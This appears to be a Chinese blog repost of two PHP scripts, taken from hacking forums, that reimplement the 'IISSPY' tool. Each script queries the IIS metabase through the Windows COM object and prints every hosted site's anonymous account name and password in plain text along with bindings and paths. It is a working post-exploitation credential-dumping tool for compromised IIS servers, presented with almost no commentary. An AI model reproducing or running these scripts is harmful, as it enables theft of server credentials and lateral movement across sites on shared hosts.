php 版iisspy

作者: admin 分类: 未分类 发布时间: 2016-12-26 20:48

作者:dust2
文章来源:https://www.t00ls.net/viewthread.php?tid=22864
日期:2013-5-16

<?php
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
?>

<html xmlns=http://www.w3.org/1999/xhtml>
<head id=Head1>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta http-equiv="pragma" content="no-cache" />
<title>IIS SPY</title>
<style type="text/css">
BODY,TD{FONT-SIZE: 14px;line-height:20px;}
.tab-content { BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; VERTICAL-ALIGN: top; BORDER-LEFT: #cccccc 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;}
.Soft-content { BORDER-RIGHT: #cccccc 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #cccccc 1px solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; VERTICAL-ALIGN: top; BORDER-LEFT: #cccccc 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;}
</style>
</head>
<body>
<table cellspacing=1 runat=server cellpadding=1 width=600px align=center border=0>
<tr><td class=Soft-content>
        <div id="frm_main">
<?php
function ShowErr($s){
        echo("<pre stylr='background:#d1d1d1;'><font color=red>$s</font></pre>");
}
if(IS_WIN && IS_COM){
        try{
        $obj=@new COM("IIS://localhost/w3svc");
        $ctn="<table class=tab-content width=100% border=0 align=center cellpadding=0 cellspacing=0>
        <tr bgcolor=#0066CC><td>ID:</td><td>IIS_USER:</td><td>IIS_PASS:</td><td>Domain:</td><td>Path:</td></tr>\n";
        $i=0;
        foreach($obj as $obj3w)
        {    
                $i++;
                if($i%2==0) $ctn.="<tr>";
                else $ctn.="<tr bgcolor=#F0F8FF>";
                if(!is_numeric($obj3w->Name)) continue;
                $webSite=new com("IIS://localhost/w3svc/".$obj3w->Name.'/Root');
                if(!$webSite)
                {        $ctn.="<td>[ERROR]=".$php_errormsg."</td><td></td><td></td><td></td><td></td></tr>\n";
                        continue;
                }
                $Binds="";
                foreach($obj3w->ServerBindings as $Binds1)
                {
                        $Binds.=$Binds1."\n";
                }
                $user=$webSite->AnonymousUserName;
                $pass=$webSite->AnonymousUserPass;
                $path=$webSite->path;
                $ctn.="<td >".$i."</td><td >".$user."</td><td >".$pass."</td><td >".$Binds."</td><td >".$path."</td></tr>\n";
        }
        $ctn.="</table>";
        echo $ctn;
        }
        catch(Exception $e){
                ShowErr($e->getMessage());
        }
}else{
        ShowErr('系统不支持');
}
?>
        </div>
</td></tr>
</table>
</body>
</html>

以下是本人(lostwolf)
日期:2012-7-28 发于 90sec 版本
来源:https://forum.90sec.org/forum.php?mod=viewthread&tid=3212
测试环境:(iis 6.0 ) 非system 无执行命令权限

调用windows COM 组建
有这个权限 一般都可以执行命令了…

<?php
$ObjService = new COM("IIS://localhost/w3svc");

foreach ($ObjService as $obj3w) {

  if(is_numeric($obj3w->Name)){

   
      $webSite=new COM("IIS://localhost/w3svc/".$obj3w->Name.'/Root');
      echo "[ID    ] " .$obj3w->Name.'</br>';
      echo "[NAME  ] " .$obj3w->ServerComment.'</br>';
      $state=intval($obj3w->ServerState);
      if ($state==2) {
     
          echo "[STATE ] running".'</br>';
      }
     
      if ($state==4) {
     
          echo "[STATE ] stoped".'</br>';
      }

      if ($state==6) {
     
          echo "[STATE ] paused".'</br>';
      }

      foreach ($obj3w->ServerBindings as $Binds){

          echo "[HOST  ] "  .$Binds.'</br>';

      }
      echo "[USER  ] " . $webSite->AnonymousUserName.'</br>';
      echo "[PASS  ] " . $webSite->AnonymousUserPass.'</br>';
      echo "[PATH  ] " . $webSite->path.'</br>';
      echo "-------------------------------------------".'</br>';

  }
}

?>

php 版iisspy

标签云